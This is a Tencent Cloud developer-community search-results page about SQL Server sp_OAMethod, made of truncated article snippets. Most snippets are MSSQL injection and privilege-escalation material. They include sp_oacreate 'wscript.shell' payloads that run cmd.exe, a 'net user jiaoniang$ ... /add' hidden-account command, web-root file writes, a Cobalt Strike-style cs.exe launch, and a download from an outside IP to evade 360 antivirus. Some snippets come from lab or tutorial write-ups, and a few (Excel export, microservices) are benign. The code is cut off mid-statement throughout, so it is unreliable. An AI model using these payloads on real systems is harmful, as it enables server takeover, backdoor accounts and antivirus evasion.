调用WebAPI时，SQL Server sp_OAMethod返回NULL - 腾讯云开发者社区 - 腾讯云

开发者社区

文档建议反馈控制台

文章/答案/技术大牛

发布

不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令

SQL Server? 实例上创建 OLE 对象实例。...sp_OAMethod 调用 OLE 对象的方法。... ] [...n]] 思路：先在SQL Server 上建立一个Wscript.Shell，调用其run Method，将cmd.exe执行的结果输出到一个文件中，然后再建立一个Scripting.FileSystemObject...以下是相应的SQL语句 CREATE TABLE mytmp(info VARCHAR(400),ID IDENTITY (1, 1) NOT NULL) DECLARE @shell INT DECLARE...out,'c:/temp.txt' --因为fso的opentextfile方法将返回一个textstream对象，所以此时@file是一个对象令牌 WHILE @shell>0 BEGIN EXEC

1.2K2 0

干货 | MSSQL注入和漏洞利用姿势总结

SQL Server 信息收集 • 判断数据库类型 /* sysobjects 为 MSSQL 数据库中独有的数据表，如果页面返回正常即可表示为 MSSQL 数据库 */ ?...SQL Server 注入报错注入 MSSQL 数据库是强类型语言数据库，当类型不一致时将会报错，配合子查询即可实现报错注入。前提是服务器允许返回报错信息。 • 查询当前数据库中的表名 ?...', 2 EXEC sp_OAMethod @object, 'Close', NULL EXEC sp_OADestroy @object • 调用 FileSystem Object 对象复制、移动等文件管理...@object2, 'Open', NULL EXEC sp_OAMethod @object2, 'Write', NULL, @response EXEC sp_OAMethod @object2...Of Other Users 默认情况下，SQL Server 的会话在用户登录时开始，在用户注销时结束。

7.9K4 1

您找到你想要的搜索结果了吗？

是的

没有找到

mssql注入

： Username：'; declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,...SQL Server? 登录或 Microsoft Windows NT? 用户帐户。如果还没有对该 Windows NT 登录授予 SQL Server 访问权限，那么将自动对其授予访问权限。...diskadmin dbcreator bulkadmin 返回代码值 0（成功）或 1（失败）注释在将登录添加到固定服务器角色时，该登录就会得到与此固定服务器角色相关的权限。...当执行远程存储过程时，OPENDATASOURCE 应该指的是另一个 SQL Server。OPENDATASOURCE 不接受参数变量。...每次调用 OPENDATASOURCE 时，都必须提供所有的连接信息（包括密码）。示例下面的示例访问来自某个表的数据，该表在 SQL Server 的另一个实例中。

4.1K8 0

注入学习1:SQL注入语句大全

SQL-SERVER，而且还可以得到大量有用信息。...，而SQL-SERVER的系统表是sysobjects,在WEB环境下有访问权限。...3、 MSSQL三个关键系统表 sysdatabases系统表：Microsoft SQL Server 上的每个数据库在表中占一行。...最初安装 SQL Server 时，sysdatabases 包含 master、model、msdb、mssqlweb 和 tempdb 数据库的项。该表只存储在 master 数据库中。...register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your

4.7K2 2

数据库安全之MSSQL渗透

端口号：1433 SA用户在搭建时，选择使用SQL Server身份验证会创建SA账户并设置密码，SA(System Administrator)表示系统管理员，在SQLServer2019之前的SA...数据被放进tempdb数据库，排完序后再把结果返回给用户。每次SQL Server重新启动，它都会清空tempdb数据库并重建。永远不要在tempdb数据库建立需要永久保存的表。...Server身份验证和Windows 身份验证)(M)配置SQL Server系统管理员SA的密码（我设置密码为123.com）安装SQL Server Managerment Studio|SSMS...Server中的一个组件，将命令字符串作为操作系统命令 shell 执行，并以文本行的形式返回所有输出。...sp_oamethod系统存储过程调用系统wscript.shell来执行系统命令。

7.2K1 0

放弃 powershell? 启动 sqlps！| 红队攻防

0x00 前言 sql server 默认安装后，会发现有一个 sqlps.exe：此文件本身自带微软签名： sqlps的功能，竟然是！启动 powershell？？？...而且由于此文件无依赖，因此可以单独取出在无sql server机器上运行。...0x01 sqlps 上线之前使用 powershell 上线，360 必拦截：使用sqlps，360无反应且能正常上线： 0x02 sp_oacreate sql server 注入后提权的方法比较多...declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,...(''http://192.168.80.138:80/a''))"' 成功上线，弊端是 sql server 默认为service权限，因此对很多目录包括sql server 默认目录都无法执行该程序

9553 0

MSSQL利用总结

CLR执行 Common Language Runtime(CLR)程序集定义为可以导入SQL Server的.NET DLL（或DLL组）。导入后，DLL方法可以链接到存储过程并通过TSQL执行。...创建和导入自定义CLR程序集的能力是开发人员扩展SQL Server本机功能的好方法，但自然也为攻击者创造了机会。以C#代码为例，将下面代码用CSC编译为dll。...@dpapp,'run',null,'calc.exe'; exec sp_oamethod @dbapp,'exec',@exec output,'C:\\windows\\system32\...定时任务启用sql server代理，右键-新建-作业 ? 步骤-新建 ? 配置执行的语句，可以自定义 ? 然后在“计划”选项里配置执行时间 ?...在执行无回显命令时，把执行结果重定向到一个文件，再用xp_fileexist判断该文件是否存在，就可知道命令是否执行成功。 2.

3.6K3 0

sqlps.exe白名单的利用（过S60！）

0x01 sqlps.exe简介 sqlps.exe是SQL Server附带的一个具有Microsoft签名的二进制文件，用于加载SQL Server cmdlet，Microsoft Visual...Microsoft SQL Server\100和110是Powershell v2，120和130是Powershell v4。...C:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe C:\Program Files (x86)\Microsoft...SQL Server\110\Tools\Binn\sqlps.exe C:\Program Files (x86)\Microsoft SQL Server\120\Tools\Binn\sqlps.exe...SQL Server\140\Tools\Binn\sqlps.exe C:\Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\sqlps.exe

1.2K1 0

MSSQLSQL Server 提权手法详解

SQL Server 提权手法详解环境：Win10 、SQL Server 2008 一、SQL Server 的安装介绍： Microsoft SQLServer是一个C/S模式的强大的关系型数据库管理系统...Server服务使用相同的账户” NT AUTHORITY\SYSTEM 点击“添加当前用户”，会自动添加当前用户点击“添加当前用户”，会自动添加当前用户一直下一步，直至安装成功二、SQL Server...SA用户的添加右键数据库，点击“属性”，然后点击确定重启sql server 点击“安全性”“登录名”找到“SA”设置这个用户的密码接着还在这个对话框中，我们点击左上角的第二个属性服务器角色（server...如果我们能够获取SA的管理员权限，我们就可以使用SA的管理权限可以直接执行扩展存储过程中的“xp_cmdshell脚本”，并获得返回值。...int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32

1.3K1 0

SQL 注入语句特征

,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null,C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574.../add-- 创建一个虚拟目录E盘： ;declare @o int exec sp_oacreatewscript.shell,@o out exec sp_oamethod @o,run,NULL...; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null,C...@o,createtextfile,@f out,c:\inetpub\wwwroot\foo.asp,1 exec @ret = sp_oamethod @f,writeline,NULL, NULL,foo,bar exec sp_oasetproperty @o,speed,150 exec sp_oamethod @o,speak,NULL,all your sequel servers

2.1K11 0

实战 | 记一次邮件系统C段引发的SQL手注和内网渗透

@ObjectToken, 'Open'; EXEC sp_OAMethod @ObjectToken, 'Write', NULL, @DATA; EXEC sp_OAMethod @ObjectToken...'run',null,'cmd /c xxxx';-- 为此，我甚至改造了个直接调用 wmi 的 declare @objWmi int,@objLocator int,@objPermiss int,...; 这玩意甚至能连接远程服务器，当然我 sqlserver 和 com 的语法不熟，纯 sql 列出进程始终没捣鼓出来，最后还是使用了 ScriptControl, 调用了 Jscript，再通过...@ObjectToken, 'Write', NULL, @DATA"+str(i3)+";" ends="""EXEC sp_OAMethod @ObjectToken, 'SaveToFile',...原本是想直接跑的，但是，我看了下，我们的主机名叫做 WFDBP3，然后查了下，俺寻思，他们肯定也是 sql server 服务器，甚至密码会不会都是一样的？

1.3K1 0

微服务实战(八)：落地微服务架构到直销系统(服务高可用性)

SQL Server 2016数据库服务提供了一种SQL AlwaysOn的高可用机制。...SQL AlwaysOn是将多台SQL Server组合成一个虚拟的SQL Server，然后通过SQL AlwaysOn的功能将需要能够自动转移故障的数据库同步到多台SQL Server上。...当WebApi连接数据库服务时，连接的是虚拟IP和端口，然后SQL AlwaysOn会自动将数据访问请求定向到主物理SQL Server上；当主服务器垮掉时，会自动转移数据服务到一台从数据库服务器上，从数据库服务器自动成为新的主数据库服务器...当前端调用WebApi服务时，连接的是NLB上配置的虚拟IP和端口，然后根据NLB的配置（有根据Web服务器负载情况路由到请求少的主机上；有根据每个请求自动轮询每个主机；有根据某个会话总是请求到特定主机...这里的Upstream指的就是前端调用API网关的特定服务时，Downstream指的就是路由到哪个特定的WebApi。

9933 0

MSSQL不出网文件落地上线方式

0x03 启用OLE组件在执行命令或写入文件时都需要用到sp_oacreate，这主要是用来创建OLE对象，所以需要先执行以下SQL语句来启用“OLE Automation Procedures”组件...注：xp_cmdshell组件调用的是cmd.exe，所以在利用这种方式写入大文件时可能会出现字符长度限制等问题。...@ObjectToken, 'Open' EXEC sp_OAMethod @ObjectToken, 'Write', NULL, @DATA EXEC sp_OAMethod...@ObjectToken, 'SaveToFile', NULL, @filepath, 2 EXEC sp_OAMethod @ObjectToken, 'Close'...@shell,'run',null,'c:\windows\system32\cmd.exe /c C:\\Windows\\temp\\cs.exe'

1.3K1 0

SQL Server命令执行方式汇总

当xp_cmdshell无法使用时，我们也可以通过sp_OACreate来创建OLE对象实例，然后利用sp_oamethod(sp_oamethod是调用一个 OLE 对象的方法)达到一个执行命令的效果...如：sp_oacreate、sp_oamethod 利用条件同上，即 1 、SQL Server数据库没有被降权； 2、 sa用户或其他具有dba权限的账户。...sql server集成了该组件，可以通过sql server编写CLR来执行系统命令。补充本地存储过程指用户创建的自定义存储过程。...如：CLR 利用条件 1、在SQL Server上能启用CLR并可以创建自定义存储过程 2、SQL Server当前账号具有执行命令/代码所需要的权限 CLR编写这里先膜拜一下Y4er...dll文件，SQL Server 通过 sp_addextendedproc 调用DLL从而达到命令执行的效果。

1.8K2 0

t-sql导出EXCEL语句

,@StartDate=null,@EndDate=null,@TrackStation=null" queryout "C:\authors.xls" -c -S "(local)" -U "sa"... 为Excel文件的工作表名,一般要加上才能正常使用. --*/ /*--数据导出EXCEL 导出表中的数据到Excel,如果文件不存在,将自动创建文件,如果表不存在,将自动创建表调用示例...',@obj out if @err0 goto lberr exec @err=sp_oamethod @obj,'open',null,@constr if @err... exec @err=sp_oamethod @obj,'execute',@out out,@sql if @err0 goto lberr exec @err=sp_oadestroy...create table ['+@sheetname +']('+substring(@sql,2,8000)+')' exec @err=sp_oamethod

1820 0

Sql Server数据导出EXCEL

将自动创建文件如果表不存在,将自动创建表基于通用性考虑,仅支持导出标准数据类型 --邹建 2003.10(引用请保留此信息)-- 增加分页功能 6.5w条一页 --Add by 谢小漫-- */ /*--调用示例...exec@err=sp_oamethod @obj,'open',null,@constr if@err0goto lberr --创建表的SQL declare@tbname sysname set...='create table ['+@sheetname +']('+substring(@sheetsql,2,8000)+')' exec@err=sp_oamethod @obj,'execute...sheetname+'_'+convert(nvarchar(80),@sheetcount-@sheetnow+1) +']('+substring(@sheetsql,2,8000)+')' exec@err=sp_oamethod...='drop table ['+@tbname+']' exec(@sql) exec@err=sp_oadestroy @obj --结束返回 return lberr: exec sp_oageterrorinfo

1950 0

注入常用SQL语句整理

Server 判断是否可注射： http://www.exehack.net/article.asp?...@shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT...： ;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe...查询结果返回的字段数； - order by 13 - 解释：排序功能，根据查询结果中的第几个字段数做排序，试探当前sql查询返回的字段数 - union select 1,2,3,4,**...load_file（）时要用replace（load_file(HEX)，char(60),char(32)） - 注：Char(60)表示 <，Char（32）表示空格 - 手工注射时出现的问题

2.6K1 1

Mssql 从测试到实战

2、SQL 注入漏洞利用从以往的经验来看，SQL 注入漏洞一直以来都是比较危险且出现频繁的漏洞，往往由于程序员在实现数据库查询功能代码时，采用拼接字符串的方式，将参数带入查询语句中，从而导致 SQL...view=sql-server-2014&preserve-view=true https://docs.microsoft.com/en-us/sql/connect/odbc/download-odbc-driver-for-sql-server...@OLE, 'OpenTextFile', @FileID OUT, 'c:\info.txt', 8, 1 EXECUTE sp_OAMethod @FileID, 'WriteLine', Null...@ObjectToken, 'Open' EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0xhex EXEC sp_OAMethod @ObjectToken...@shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\test.txt' 执行成功后，不会有内容返回，如图：接下来去看看 c

1.8K2 0

SQL 基础学习参考资料分享

最好使用 union 和 all 的搭配 2、如果不显示左表的内容需要把左 SQL 设为假，可以是 -1 或者不存在的条件 3、在 union 查询时，填充字符最好使用 NULL 找出列的类型 ' union...'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' Username: '; declare @o int...exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' -- 使用 xp_cmdshell...执行系统命令 (S) 在 *SQL Server 2005 中时默认禁掉的，如果有管理员权限可以开启。...FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ; 关掉 SQL Server (S) 当你真的要关闭时使用：';shutdown --

1.2K2 0

vulntarget-h 打靶记录

本文所提供的工具仅用于学习，禁止用于其他，请在24小时内删除工具文件！！！本文作者：NaMi，本文为NaMi原创。...相关漏洞技术 sql注入、文件包含、命令执行，免杀等漏洞利用、隧道代理等本地环境配置 win2008 > ip : 192.168.153.130 192.168.1.102 win7...user_id to search for details of a particular users 备注:使用querystring值user_id查询特定用户的详细信息既然都给提示了，那么就直接SQL...@f,'CreateTextFile',@f OUTPUT,'C:\inetpub\wwwroot\11.txt'; EXEC sp_oamethod @f,'WriteLine',null,'aaaaac...@f,'CreateTextFile',@f OUTPUT,'C:\inetpub\edrfgyhujikopl\11.txt'; EXEC sp_oamethod @f,'WriteLine',null

8792 0

点击加载更多

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭